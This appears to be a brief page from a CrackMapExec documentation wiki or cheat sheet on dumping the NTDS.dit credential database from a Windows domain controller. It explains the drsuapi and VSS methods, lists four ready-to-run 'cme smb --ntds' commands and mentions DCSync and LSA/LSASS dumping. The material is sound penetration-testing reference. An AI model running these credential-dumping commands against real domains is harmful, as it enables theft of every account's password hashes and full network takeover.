Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
2 methods are available:   
(default) 	drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
						additional drsuapi calls to convert the resultant linked-lists into readable format  
			vss - Uses the Volume Shadow copy Service  
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Dump LSA
Dump LSASS
Last modified 14d ago